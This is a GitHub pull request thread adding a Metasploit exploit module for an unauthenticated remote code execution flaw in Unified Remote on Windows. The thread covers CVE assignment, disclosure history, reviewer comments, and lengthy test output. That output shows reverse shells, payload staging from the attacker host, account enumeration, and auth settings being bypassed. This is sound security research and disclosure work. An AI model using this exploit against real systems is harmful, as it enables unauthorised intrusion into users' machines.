Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

unified_remote exploit #16989

Merged
merged 7 commits into from Sep 21, 2022
Merged

unified_remote exploit #16989

merged 7 commits into from Sep 21, 2022

Conversation

h00die
Copy link
Contributor

@h00die h00die commented Sep 7, 2022

A similar exploit to #16985

This PR adds a new module to exploit an auth bypass to rce in 'unified remote'.
Leaving it draft right now, talking to @todb / @todb-r7 about a possible CVE for it. Also needs a real description and docs, but wanted to post for gathering info on the CVE stuff.

@H4rk3nz0 looks like you were the original author (and your twitter is gone), did you ever reach out to the company to responsibly disclose? If so, can you post details so we can possibly get this CVEd as well? Its still valid against the most recent version.

This is a neat exploit as you connect to the WEB server (no auth) to pull the config, then set the RDP-ish auth to be none if needed. Then connect to the service and ask it to open cmd, then type out what you want on the user's screen. its fun to watch shell code :). Wrote in a cmdstager method, but due to the buffering and timeouts, decided to remove it as it just wasn't a good fit at all unfortunately. used @H4rk3nz0's original method which uses the host to host the payload on a web server and just download it. MUCH faster and more reliable.

Verification

  • install and start software. i tried it on the one linked in EDB and the most recent one on the website
  • Start msfconsole
  • use exploit/windows/misc/unified_remote
  • Set rhost and lhost as required.
  • run
  • Verify it works with an auth method not none, and with none
  • Document looks good

@github-actions
Copy link

github-actions bot commented Sep 7, 2022

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@h00die
Copy link
Contributor Author

h00die commented Sep 7, 2022

@H4rk3nz0 wanted to show you https://github.com/rapid7/metasploit-framework/pull/16989/files#diff-36de1eb4db0be8601b9f08557b8add6cf522a8b14f93bf59aee7eb83ca1dc547R133 . In your original POC you had da, d8, dc, ut all those call outs for 'space' and such weren't needed as it was just changing the body length variable.

@H4rk3nz0
Copy link

H4rk3nz0 commented Sep 7, 2022

@h00die thanks for the cool module writeup, never did get far with dissecting what everything in the hex body was doing : ) . I do recall reaching out to unified remote through their on site contact at the time of testing unified remote (~ mid February 2021). I am having trouble finding the exact date of that correspondence as it was just a response from them stating that they don't consider it a problem as users are able to set authentication passwords for the web console which was disabled by default. I didn't chase for a CVE at the time. Will let you know if I can locate an exact date but it may be lost to the digital ether.

@h00die
Copy link
Contributor Author

h00die commented Sep 8, 2022

@H4rk3nz0 interesting. I see how you can disable the web console (its enabled by default), but not how to 'secure' it. I see you can set creds for the remote portion, but we can bypass that if the web console is enabled. Seems like things aren't adding up, but i guess we can move forward w/o a CVE. I'm adding in some checks now for the site being down, and then will push this up for review

@h00die h00die marked this pull request as ready for review September 8, 2022 21:09
@h00die
Copy link
Contributor Author

h00die commented Sep 8, 2022

@H4rk3nz0 if you have time, give this module a try and let me know how its working for you.

Copy link
Contributor

@cdelafuente-r7 cdelafuente-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks @h00die for this module! I just left a few minor comments for you to review when you get a chance.

modules/exploits/windows/misc/unified_remote_rce.rb Outdated Show resolved Hide resolved
modules/exploits/windows/misc/unified_remote_rce.rb Outdated Show resolved Hide resolved
modules/exploits/windows/misc/unified_remote_rce.rb Outdated Show resolved Hide resolved
@h00die
Copy link
Contributor Author

h00die commented Sep 14, 2022

@H4rk3nz0 can you please confirm there is a way to auth the web page controller? i don't see that option anywhere, just 'turn it off and on'

@H4rk3nz0
Copy link

Hi @h00die I believe I misunderstood the functionality of the password feature at the time. I am unable to secure web console outside of completely disabling it.

Also I thought this may interest you as a potential improvement to the current script that can remove the possibility of user interacting interrupting the payload process:

https://pastebin.com/raw/VMeWckHA

I have attached a modified script (rough and quick edit apologies) as unified remote has a 'premium feature' for the mobile app that allows executing commands remotely as a 'utility function' naturally not too hard to figure out what is controlling length of string set as command payload. It all happens out of view of the GUI. Let me know what you think, cheers.

@H4rk3nz0
Copy link

Quick extra note - any command output is returned in TCP response from the unified remote server as a Result: if that is of interest.

@h00die
Copy link
Contributor Author

h00die commented Sep 15, 2022

pushing back to draft while looking at the improvements

@h00die h00die marked this pull request as draft September 15, 2022 19:15
@todb-r7
Copy link

todb-r7 commented Sep 15, 2022

Hi @h00die and @H4rk3nz0

So for a CVE, let's gather this in one place, so I can release @smcintyre-r7 and/or @mkienow-r7 to actually do the CVE assignment.

Here's the CVE distillation:

Title: Unified Intents AB Unified Remote Improper Authorization
Vulnerable Software/Component name: Unified Remote
Vendor/Project name: Unified Intents AB
Vulnerable Version Number: 3.11.0.2483 (50)
CWE: CWE-285 Improper Authorization
Short Description: Because the web management interface for Unified Intents' Unified Remote solution does not itself require authentication, a remote, unauthenticated attacker can change or disable authentication requirements for the Unified Remote protocol, and leverage this now-unauthenticated access to run code of the attacker's choosing.

@mkienow-r7
Copy link
Contributor

Reserved CVE ID CVE-2022-3229.

@h00die h00die marked this pull request as ready for review September 18, 2022 23:04
@h00die
Copy link
Contributor Author

h00die commented Sep 18, 2022

@H4rk3nz0 implemented the new hidden script mode. Works great. added docs and cve.

PS @H4rk3nz0 congrats on getting 2 CVEs and hopefully soon 2 modules in metasploit! May be almost a year after discovery, but better late than never!

@h00die
Copy link
Contributor Author

h00die commented Sep 19, 2022

@H4rk3nz0 was the name 'update' something you set in the script name? Seemed like it, but i forgot to test making that variable before updating the PR

@H4rk3nz0
Copy link

@h00die , thanks for the hard work transcribing the scripts to msf modules. Your hard work is much appreciated. With regards to 'update' I assume you're referring to within the hex and call for the 'invisible' feature? As I understand it, the invisible command execution feature creates a batch file on Windows and a bash file on linux hosts which it makes calls to 'update' the content of then executes it in a following call and returns the output. https://www.unifiedremote.com/remotes/command

As I understand it despite being a 'pro' feature the invisible option should work by default on all unified remote installations. Also a quick note: I see you included the pastebin url I shared as a reference but please be aware that pastebin will expire in 9 days time from now. I didn't expect that you would include it, my apologies. If you would like to modify that and create a more permanent store then by all means.

@h00die
Copy link
Contributor Author

h00die commented Sep 19, 2022

after testing, the word 'update' is not changeable, its part of the protocol.

@H4rk3nz0 I'll leave the ref in there for the time being incase there's any other changes during testing

Copy link
Contributor

@cdelafuente-r7 cdelafuente-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks @h00die for your updates. I just left a few minor comments before it lands. I tested with all the different configurations you described in the documentation and it works great.

modules/exploits/windows/misc/unified_remote_rce.rb Outdated Show resolved Hide resolved
modules/exploits/windows/misc/unified_remote_rce.rb Outdated Show resolved Hide resolved
modules/exploits/windows/misc/unified_remote_rce.rb Outdated Show resolved Hide resolved
modules/exploits/windows/misc/unified_remote_rce.rb Outdated Show resolved Hide resolved
@h00die
Copy link
Contributor Author

h00die commented Sep 20, 2022

should be good to go!

@cdelafuente-r7
Copy link
Contributor

Thanks @h00die for updating this. Everything looks good to me now. I tested multiple scenarios against Unified Remote version 3.11.0.2483(50) on Windows 11 and verify it works as expected. I'll go ahead and land it.

Example output

Tested against Unified Remote version 3.11.0.2483(50) on Windows 11

No authentication - visible true
msf6 exploit(windows/misc/unified_remote_rce) > exploit lhost=10.0.0.1 rhosts=10.0.0.81 verbose=true visible=true

[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.81:9512 - Client name set to: android-95DshytVePd24tlG
[*] 10.0.0.81:9512 - Retrieving server config
[+] 10.0.0.81:9512 - No security enabled
[+] 10.0.0.81:9512 - Found account: admin
[+] 10.0.0.81:9512 - Found account: msfuser
[*] 10.0.0.81:9512 - Sending handshake
[*] 10.0.0.81:9512 - Sending empty authentication
[*] 10.0.0.81:9512 - Using URL: http://10.0.0.1:8080/
[*] 10.0.0.81:9512 - Opening Start Menu
[*] 10.0.0.81:9512 - Opening command prompt
[*] 10.0.0.81:9512 - Typing out payload
[*] 10.0.0.81:9512 - Attempting to open payload
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.0.0.81
[*] Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.81:49995) at 2022-09-21 13:49:22 +0200
[*] 10.0.0.81:9512 - Server stopped.
[!] 10.0.0.81:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\L3jbM5pW.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.22000.856]
-----


C:\Users\n00tmeg>whoami
whoami
desktop-26cqrhp\n00tmeg

C:\Users\n00tmeg>ver
ver

Microsoft Windows [Version 10.0.22000.856]

C:\Users\n00tmeg>exit
exit

[*] 10.0.0.81 - Command shell session 1 closed.  Reason: User exit
msf6 exploit(windows/misc/unified_remote_rce) > creds
Credentials
===========

host             origin           service                public   private  realm  private_type    JtR Format
----             ------           -------                ------   -------  -----  ------------    ----------
10.0.0.81  10.0.0.81  9512/tcp (wifi mouse)  admin                    Blank password
10.0.0.81  10.0.0.81  9512/tcp (wifi mouse)  msfuser                  Blank password
No authentication - visible false
msf6 exploit(windows/misc/unified_remote_rce) > exploit lhost=10.0.0.1 rhosts=10.0.0.81 verbose=true visible=false

[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.81:9512 - Client name set to: android-tDfVeyZv8mxrOlWz
[*] 10.0.0.81:9512 - Retrieving server config
[+] 10.0.0.81:9512 - No security enabled
[+] 10.0.0.81:9512 - Found account: admin
[+] 10.0.0.81:9512 - Found account: msfuser
[*] 10.0.0.81:9512 - Sending handshake
[*] 10.0.0.81:9512 - Sending empty authentication
[*] 10.0.0.81:9512 - Using URL: http://10.0.0.1:8080/
[*] 10.0.0.81:9512 - Loading Unified.Command
[*] 10.0.0.81:9512 - Updating Unified.Command
[*] 10.0.0.81:9512 - Sending payload
[*] 10.0.0.81:9512 - Executing script
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.0.0.81
[*] Command shell session 2 opened (10.0.0.1:4444 -> 10.0.0.81:50906) at 2022-09-21 13:53:46 +0200
[*] 10.0.0.81:9512 - Server stopped.
[!] 10.0.0.81:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\0ZCveCmHMEWfJ.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.22000.856]
-----


C:\ProgramData\Unified Remote\Remotes\Bundled\Unified\Main\Command>ver
ver

Microsoft Windows [Version 10.0.22000.856]

C:\ProgramData\Unified Remote\Remotes\Bundled\Unified\Main\Command>exit
exit
Group authentication - visible true
msf6 exploit(windows/misc/unified_remote_rce) > exploit lhost=10.0.0.1 rhosts=10.0.0.81 verbose=true visible=true

[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.81:9512 - Client name set to: android-j3bhA09vMPvXb8vQ
[*] 10.0.0.81:9512 - Retrieving server config
[*] 10.0.0.81:9512 - anonymous mode enabled, password required, bypassing
[*] 10.0.0.81:9512 - Uploading new server config
[*] 10.0.0.81:9512 - Sleeping 5 seconds for server to restart
[+] 10.0.0.81:9512 - Found account: admin
[+] 10.0.0.81:9512 - Found account: msfuser
[*] 10.0.0.81:9512 - Sending handshake
[*] 10.0.0.81:9512 - Sending empty authentication
[*] 10.0.0.81:9512 - Using URL: http://10.0.0.1:8080/
[*] 10.0.0.81:9512 - Opening Start Menu
[*] 10.0.0.81:9512 - Opening command prompt
[*] 10.0.0.81:9512 - Typing out payload
[*] 10.0.0.81:9512 - Attempting to open payload
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] 10.0.0.81:9512 - Reverting security mode
[*] 10.0.0.81:9512 - Uploading new server config
[*] 10.0.0.81:9512 - Sleeping 5 seconds for server to restart
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.0.0.81
[*] Command shell session 3 opened (10.0.0.1:4444 -> 10.0.0.81:51241) at 2022-09-21 13:55:20 +0200
[*] 10.0.0.81:9512 - Server stopped.
[!] 10.0.0.81:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\cz4TFFcXcjRky6KM6.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.22000.856]
-----


C:\Users\n00tmeg>ver
ver

Microsoft Windows [Version 10.0.22000.856]

C:\Users\n00tmeg>exit
exit
Group authentication - visible false
msf6 exploit(windows/misc/unified_remote_rce) > exploit lhost=10.0.0.1 rhosts=10.0.0.81 verbose=true visible=false

[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.81:9512 - Client name set to: android-c39NkUzx13S9npUY
[*] 10.0.0.81:9512 - Retrieving server config
[*] 10.0.0.81:9512 - anonymous mode enabled, password required, bypassing
[*] 10.0.0.81:9512 - Uploading new server config
[*] 10.0.0.81:9512 - Sleeping 5 seconds for server to restart
[+] 10.0.0.81:9512 - Found account: admin
[+] 10.0.0.81:9512 - Found account: msfuser
[*] 10.0.0.81:9512 - Sending handshake
[*] 10.0.0.81:9512 - Sending empty authentication
[*] 10.0.0.81:9512 - Using URL: http://10.0.0.1:8080/
[*] 10.0.0.81:9512 - Loading Unified.Command
[*] 10.0.0.81:9512 - Updating Unified.Command
[*] 10.0.0.81:9512 - Sending payload
[*] 10.0.0.81:9512 - Executing script
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.0.0.81
[*] 10.0.0.81:9512 - Reverting security mode
[*] 10.0.0.81:9512 - Uploading new server config
[*] 10.0.0.81:9512 - Sleeping 5 seconds for server to restart
[*] Command shell session 4 opened (10.0.0.1:4444 -> 10.0.0.81:51492) at 2022-09-21 13:56:34 +0200
[*] 10.0.0.81:9512 - Server stopped.
[!] 10.0.0.81:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\dew14t1g0D82F8.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.22000.856]
-----


C:\ProgramData\Unified Remote\Remotes\Bundled\Unified\Main\Command>ver
ver

Microsoft Windows [Version 10.0.22000.856]

C:\ProgramData\Unified Remote\Remotes\Bundled\Unified\Main\Command>exit
exit
User authentication - visible true
msf6 exploit(windows/misc/unified_remote_rce) > exploit lhost=10.0.0.1 rhosts=10.0.0.81 verbose=true visible=true

[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.81:9512 - Client name set to: android-ZKbbUwQMtpWfQ0Sp
[*] 10.0.0.81:9512 - Retrieving server config
[*] 10.0.0.81:9512 - users mode enabled, password required, bypassing
[*] 10.0.0.81:9512 - Uploading new server config
[*] 10.0.0.81:9512 - Sleeping 5 seconds for server to restart
[+] 10.0.0.81:9512 - Found account: admin
[+] 10.0.0.81:9512 - Found account: msfuser
[*] 10.0.0.81:9512 - Sending handshake
[*] 10.0.0.81:9512 - Sending empty authentication
[*] 10.0.0.81:9512 - Using URL: http://10.0.0.1:8080/
[*] 10.0.0.81:9512 - Opening Start Menu
[*] 10.0.0.81:9512 - Opening command prompt
[*] 10.0.0.81:9512 - Typing out payload
[*] 10.0.0.81:9512 - Attempting to open payload
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] 10.0.0.81:9512 - Reverting security mode
[*] 10.0.0.81:9512 - Uploading new server config
[*] 10.0.0.81:9512 - Sleeping 5 seconds for server to restart
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.0.0.81
[*] Command shell session 5 opened (10.0.0.1:4444 -> 10.0.0.81:51750) at 2022-09-21 13:57:55 +0200
[*] 10.0.0.81:9512 - Server stopped.
[!] 10.0.0.81:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\htrpsCR8Ye5VLd.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.22000.856]
-----


C:\Users\n00tmeg>ver
ver

Microsoft Windows [Version 10.0.22000.856]

C:\Users\n00tmeg>exit
exit
User authentication - visible false
msf6 exploit(windows/misc/unified_remote_rce) > exploit lhost=10.0.0.1 rhosts=10.0.0.81 verbose=true visible=false

[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.81:9512 - Client name set to: android-B1xhVXeS4GuKVTI9
[*] 10.0.0.81:9512 - Retrieving server config
[*] 10.0.0.81:9512 - users mode enabled, password required, bypassing
[*] 10.0.0.81:9512 - Uploading new server config
[*] 10.0.0.81:9512 - Sleeping 5 seconds for server to restart
[+] 10.0.0.81:9512 - Found account: admin
[+] 10.0.0.81:9512 - Found account: msfuser
[*] 10.0.0.81:9512 - Sending handshake
[*] 10.0.0.81:9512 - Sending empty authentication
[*] 10.0.0.81:9512 - Using URL: http://10.0.0.1:8080/
[*] 10.0.0.81:9512 - Loading Unified.Command
[*] 10.0.0.81:9512 - Updating Unified.Command
[*] 10.0.0.81:9512 - Sending payload
[*] 10.0.0.81:9512 - Executing script
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.0.0.81
[*] 10.0.0.81:9512 - Reverting security mode
[*] 10.0.0.81:9512 - Uploading new server config
[*] 10.0.0.81:9512 - Sleeping 5 seconds for server to restart
[*] Command shell session 6 opened (10.0.0.1:4444 -> 10.0.0.81:52012) at 2022-09-21 13:59:09 +0200
[*] 10.0.0.81:9512 - Server stopped.
[!] 10.0.0.81:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\GHddShH1Ppzs8EZ8.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.22000.856]
-----


C:\ProgramData\Unified Remote\Remotes\Bundled\Unified\Main\Command>ver
ver

Microsoft Windows [Version 10.0.22000.856]

C:\ProgramData\Unified Remote\Remotes\Bundled\Unified\Main\Command>exit
exit
No authentication - no web server access - visible true
msf6 exploit(windows/misc/unified_remote_rce) > exploit lhost=10.0.0.1 rhosts=10.0.0.81 verbose=true visible=true

[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.81:9512 - Client name set to: android-ogRbsUFX62J8iFdA
[*] 10.0.0.81:9512 - Retrieving server config
[-] 10.0.0.81:9512 - Web interface is disabled. Unable to attempt bypass, assuming no authentication.
[*] 10.0.0.81:9512 - Sending handshake
[*] 10.0.0.81:9512 - Sending empty authentication
[*] 10.0.0.81:9512 - Using URL: http://10.0.0.1:8080/
[*] 10.0.0.81:9512 - Opening Start Menu
[*] 10.0.0.81:9512 - Opening command prompt
[*] 10.0.0.81:9512 - Typing out payload
[*] 10.0.0.81:9512 - Attempting to open payload
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.0.0.81
[*] Command shell session 7 opened (10.0.0.1:4444 -> 10.0.0.81:52354) at 2022-09-21 14:00:56 +0200
[*] 10.0.0.81:9512 - Server stopped.
[!] 10.0.0.81:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\3gr3nCxvVz.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.22000.856]
-----


C:\Users\n00tmeg>ver
ver

Microsoft Windows [Version 10.0.22000.856]

C:\Users\n00tmeg>exit
exit
User authentication - no web server access - visible true (should fail)
msf6 exploit(windows/misc/unified_remote_rce) > exploit lhost=10.0.0.1 rhosts=10.0.0.81 verbose=true visible=true

[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.81:9512 - Client name set to: android-mFdZeFQQlIEC4tny
[*] 10.0.0.81:9512 - Retrieving server config
[-] 10.0.0.81:9512 - Web interface is disabled. Unable to attempt bypass, assuming no authentication.
[*] 10.0.0.81:9512 - Sending handshake
[*] 10.0.0.81:9512 - Sending empty authentication
[*] 10.0.0.81:9512 - Using URL: http://10.0.0.1:8080/
[*] 10.0.0.81:9512 - Opening Start Menu
[*] 10.0.0.81:9512 - Opening command prompt
[*] 10.0.0.81:9512 - Typing out payload
[*] 10.0.0.81:9512 - Attempting to open payload
[*] 10.0.0.81:9512 - Server stopped.
[!] 10.0.0.81:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\pVjiMsClA2.exe' on the target
[*] Exploit completed, but no session was created.

@cdelafuente-r7 cdelafuente-r7 added the rn-modules release notes for new or majorly enhanced modules label Sep 21, 2022
@cdelafuente-r7 cdelafuente-r7 merged commit 4943d86 into rapid7:master Sep 21, 2022
23 checks passed
@cdelafuente-r7
Copy link
Contributor

Release Notes

This adds an exploit module to exploit an authentication bypass to achieve remote code execution in Unified Remote on Windows. Note that the latest version (3.11.0.2483) is vulnerable, which make it a 0-Day.

@h00die h00die deleted the unified_remote branch September 21, 2022 19:20
@todb-r7
Copy link

todb-r7 commented Feb 6, 2023

FWIW, just published this CVE. Sorry for the delay.

@H4rk3nz0
Copy link

H4rk3nz0 commented Feb 6, 2023

Not a problem, I just got the Web Triggerable RCE working. In theory any Unified Remote user that visits a web page* with the right JS could get popped.


### PATH

This ONLY applies to the pull method. Where to temporarily store the payload. Defaults to `c:\\Windows\\Temp\\`
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

What alternatives are there to "the pull method" ?

pull is not mentioned or documented anywhere else, with the exception of the module target which states "pull".

'Platform' => 'win',
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' => [
['pull', {}],
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

6 participants